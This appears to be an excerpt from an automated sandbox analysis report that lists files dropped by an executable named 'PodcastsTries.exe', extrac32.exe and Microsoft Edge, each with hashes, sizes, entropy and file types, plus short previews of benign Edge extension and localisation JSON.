                                                                                                                                                                                                                                                                                                        SHA-512:B2455143EEC881FFBDFE29ECBA5C26634C3D5DABDB02018C4D4ECE6060EBF56A6FACB1280A349577AF51B7FE85199D33A922A24EFF321106FD9DD308C2349A8F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):93184
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.5818680027726835
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:VoQjz7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynB6GMKY99z+ajU1RA:VoQ7t8T6pUkBJR8CThpmESv+AqVnBypN
                                                                                                                                                                                                                                                                                                        MD5:9E321DFCCE426649C3D616E4E2B75C1D
                                                                                                                                                                                                                                                                                                        SHA1:02734EBEC30A12BFD88BDD050E9ECAA61AFEE74C
                                                                                                                                                                                                                                                                                                        SHA-256:DF97AFF410243492A1699143E47D56DCAC03F6D75A8EF1B260230DA19C43CC52
                                                                                                                                                                                                                                                                                                        SHA-512:9EF758A2A5CEC9D0D546A4926B05C99A0EE092AC5DCD8DD1642E5ECF1368FF7197C67CF057D0DF0C22CED8BE19863BE9E3BBC09CB6D54B3DFE636948938ACAAD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PodcastsTries.exe
                                                                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, 489607 bytes, 12 files, at 0x2c +A "Alarm" +A "Compensation", ID 9111, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):489607
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.998421997526946
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:12288:T3qjVU4bSA/m5JNIy/LeAlOw3CMMabjOScULSsVF9:TaTRQ/B/LPliabSUWsVF9
                                                                                                                                                                                                                                                                                                        MD5:6366E6809399935DDF2C3B586966A6AD
                                                                                                                                                                                                                                                                                                        SHA1:9E4BA3DE989DBD0320E9FA1AD58E2DD1F4054E39
                                                                                                                                                                                                                                                                                                        SHA-256:CF8C686A8B0F8C2E5F0DF3F21285EAFB5967099B0BC7E3656D9CEE0BA121014F
                                                                                                                                                                                                                                                                                                        SHA-512:5C7B1373CEB3B2431F26881174F123BFBAF4B97CEFED5DCC2C9F891DDF55B27D5280AA7663EE2603BD5A3D2C0240589C11AFF4EAE8CAE731DDEDBAEF711D4049
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.713111324016842
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:ZI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CU:G4CE0Imbi80U
                                                                                                                                                                                                                                                                                                        MD5:4ED0758AAB64693C1223B86F38E29881
                                                                                                                                                                                                                                                                                                        SHA1:B0E66408119FA1E9445CD1D96E3BF24F2143640E
                                                                                                                                                                                                                                                                                                        SHA-256:20475DF0585B1246382EE087041588A7BC19B50F0215918CC6E75A0490080358
                                                                                                                                                                                                                                                                                                        SHA-512:9D56B1EE3EE441A5E26983E000F93D8F494AE75FAC42C1802578F3B101D35A969974A181C2FEC22E7CA222D62C2FF2A3283CA4C2E792F0C878894FB663962FA2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):57344
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.480155783434378
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:pCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRXzW8/uC6LdTmHwA+:EtCZEMnVIPPBxT/sZydTmK
                                                                                                                                                                                                                                                                                                        MD5:0327ACD88E3DA1B11D3762F0AF700392
                                                                                                                                                                                                                                                                                                        SHA1:C8528D2AB7016A043212DC77C734683E9E261C34
                                                                                                                                                                                                                                                                                                        SHA-256:A1525C0BB5DFB6E70F0FA5F5DD46EE4CAF1B9705699C41802337B5967E57A352
                                                                                                                                                                                                                                                                                                        SHA-512:8639CE459611FC817B4897EA92586C4D57EBCADA4EFD577DCE2048A2F59E3683715F04D75EF4A802B2F40C02EEB7144548CCCFA33CC61AED27C75B5776DD8994
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):102400
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.694148661726765
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:E5mjccBiqXvpgF4qv+32eOyKODOSpQSAV:EaccB3gBmmLsiS+SAV
                                                                                                                                                                                                                                                                                                        MD5:56A58CDE1E92C2FB8573D592C7D02589
                                                                                                                                                                                                                                                                                                        SHA1:08E057ABF8985D0A68A358B38148C5C553021670
                                                                                                                                                                                                                                                                                                        SHA-256:80EFD8CF4BDF20BA34E33607019AC6886E11B6A7EE23497808FE4800CA1EFF6C
                                                                                                                                                                                                                                                                                                        SHA-512:DD2D469FC86E6FFDDDE67D093D9673B2A2CC685E95BFE52C0BCE73C93AB63D4DADCE55110FAEDD4E09A3A01678A3317C2F0982A871617AC9CB0DED8B79B7EA92
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):78848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.108418249439916
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:qKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8n:qKaj6iTcPAsAhxjgarB/5el3EYri
                                                                                                                                                                                                                                                                                                        MD5:8F98428DE673AD45CDA24EEC4FBAE1EF
                                                                                                                                                                                                                                                                                                        SHA1:89D66EF54B642CC8A4F11F25B803869771C22AD3
                                                                                                                                                                                                                                                                                                        SHA-256:5E29A9D0E92213D14820E4EA8C1B7B62EE1FC8D2221886C73AF71F741122694A
                                                                                                                                                                                                                                                                                                        SHA-512:9DD83124240FA66EADCAB214A14C43946CFA392171708CA199FCD5378E860252EA9076C175C855B6B0DB3C628338E5E0E8C5FB9FCA30E42197B9EBD3CEFC526C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.407657121497128
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0ScKu5BlM016TC:JIVuwEw5MUFZLBQLtgqRM
                                                                                                                                                                                                                                                                                                        MD5:0EBBB7C0400E100A90AC61CDDD08306F
                                                                                                                                                                                                                                                                                                        SHA1:859F1A52BED23F9B9D6CF0D2B4EE47CA0E235803
                                                                                                                                                                                                                                                                                                        SHA-256:20E60EB5579954799D37654DB8C2D444FF7C4D444946E3910BA8BA54B606C0E4
                                                                                                                                                                                                                                                                                                        SHA-512:EA04448FFDC137654094A628A77F57CE601022129C72B5E41A8F3F0156D62FEB1B12CCC67218A9BAB9464E81C53BC2C3AFC2E49FC9C8C748AF62BD51EE3B64BE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4982
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                        MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                        SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                        SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                        SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):908
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                        MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                        SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                        SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                        SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1285
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                        MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                        SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                        SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                        SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1244
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                        MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                        SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                        SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                        Malicious:false
